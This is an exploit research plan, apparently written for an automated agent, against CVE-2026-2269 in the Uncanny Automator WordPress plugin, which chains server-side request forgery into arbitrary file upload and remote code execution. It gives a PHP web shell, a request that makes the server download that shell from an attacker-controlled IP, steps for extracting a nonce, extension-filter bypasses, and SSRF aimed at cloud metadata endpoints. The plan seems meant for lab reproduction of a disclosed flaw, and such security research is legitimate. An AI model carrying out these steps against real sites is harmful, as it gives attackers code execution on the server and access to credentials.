Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin <= 7.0.0.3 - Authenticated (Administrator+) Server-Side Request Forgery to Arbitrary File Upload

This research plan targets CVE-2026-2269, a critical vulnerability in the Uncanny Automator plugin (<= 7.0.0.3). The vulnerability combines Server-Side Request Forgery (SSRF) and Unrestricted File Upload, allowing an Administrator to achieve Remote Code Execution (RCE) by leveraging the plugin's file-handling logic.

---

1. Vulnerability Summary

• Vulnerability: Authenticated SSRF to Arbitrary File Upload.
• Location: The plugin utilizes the WordPress core function download_url() to fetch remote content.
• Root Cause: The plugin fails to validate the source URL (allowing SSRF to internal/external services) and subsequently stores the downloaded file on the local filesystem without restricting dangerous file types (e.g., .php).
• Impact: An Administrator can force the server to download a malicious PHP script from a remote URL and save it in a web-accessible directory, leading to RCE.

2. Attack Vector Analysis

• Endpoint: WordPress AJAX interface (/wp-admin/admin-ajax.php).
• Action: Likely uap_automator_remote_file_download or a similar action within the "Integrations" or "Webhooks" modules (inferred).
• Payload Parameter: A parameter such as url, file_url, or remote_path.
• Authentication: Administrator level required.
• Precondition: The plugin must be active. The attacker needs a valid session cookie and a security nonce.

3. Code Flow (Trace)

1. Entry Point: The Administrator triggers a workflow or setting that requests a remote file (e.g., an action in a recipe that fetches an image or document from a URL).
2. AJAX Handler: The request is handled by a function registered via add_action('wp_ajax_...').
3. Vulnerable Call: The handler passes the user-supplied URL to download_url( $url ).
4. SSRF: download_url() performs a GET request to the provided URL.
5. File Storage: The function returns the path to a temporary file. The plugin then moves this file to a permanent directory (e.g., wp-content/uploads/uncanny-automator/) using rename() or wp_handle_sideload().
6. Extension Logic: If the plugin uses the filename from the URL (e.g., http://attacker.com/shell.php), and does not validate the extension, shell.php is saved to the server.

4. Nonce Acquisition Strategy

Uncanny Automator typically localizes its script data in the WordPress admin dashboard.

1. Identify Shortcode/Page: Navigate to the "Automator" -> "All Recipes" or "Settings" page. The scripts are usually enqueued on all Automator admin pages.
2. Navigate: Use browser_navigate to http://localhost:8080/wp-admin/admin.php?page=uncanny-automator-config.
3. Extract Nonce:
   • Search the HTML source for a JavaScript object named uap_data or uap_admin_data.
   • Verification: Use browser_eval("window.uap_data?.nonce") or browser_eval("window.uap_admin_data?.nonce").
   • The exact key is likely nonce or ajax_nonce.

5. Test Data Setup

1. Plugin Installation: Ensure Uncanny Automator <= 7.0.0.3 is installed and active.
2. Attacker Server: A remote server (or the local environment accessible to the WP instance) must host a file named exploit.php containing:

   <?php echo 'VULNERABLE_STAMP'; system($_GET['cmd']); ?>
   

3. Permissions: Ensure the wp-content/uploads/ directory is writable by the web server.

6. Exploitation Strategy

The agent should perform a "Discovery" step first to find the exact AJAX action since source code is absent.

Step 1: Discovery (Grep for Sink)

Search for the usage of download_url in the plugin directory:

grep -rn "download_url" /var/www/html/wp-content/plugins/uncanny-automator/

Identify the function name containing this call and find where that function is used in an AJAX handler:

grep -rn "add_action.*wp_ajax" /var/www/html/wp-content/plugins/uncanny-automator/

Step 2: Extract Nonce

Use the browser_navigate and browser_eval tools as described in Section 4 to obtain the uap_data nonce.

Step 3: Trigger the SSRF/Upload

Send a POST request via http_request to admin-ajax.php.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=[ACTION_FOUND_IN_STEP_1]&nonce=[NONCE]&url=http://[ATTACKER_IP]/exploit.php
  

Step 4: Locate the Uploaded File

The plugin usually stores files in:
/wp-content/uploads/uncanny-automator/[RECIPE_ID]/exploit.php
Or simply:
/wp-content/uploads/exploit.php

Check the AJAX response; it often returns the path or URL of the saved file.

7. Expected Results

• The admin-ajax.php response should return a success status (e.g., {"success": true}).
• A file named exploit.php should now exist in a web-accessible subdirectory of wp-content/uploads/.
• Accessing http://localhost:8080/wp-content/uploads/.../exploit.php?cmd=id should return the output of the id command.

8. Verification Steps

1. File Existence: Check for the file via CLI:

   find /var/www/html/wp-content/uploads/ -name "exploit.php"
   

2. RCE Confirmation: Use http_request to trigger the shell:

   GET http://localhost:8080/wp-content/uploads/[PATH_TO]/exploit.php?cmd=whoami
   

   Confirm the response contains the web user (e.g., www-data).

9. Alternative Approaches

• Webhook Sink: If no direct "download" AJAX action is found, look for "Incoming Webhook" handlers that process URL-based image attachments.
• Filter Bypass: If the plugin checks for .php in the URL, try http://attacker.com/exploit.php?ignore=.jpg or a Null Byte (if supported by the PHP version/OS).
• Internal SSRF: If RCE is blocked by path restrictions, verify SSRF by targeting http://localhost:8080/wp-admin/ or internal metadata services (e.g., http://169.254.169.254).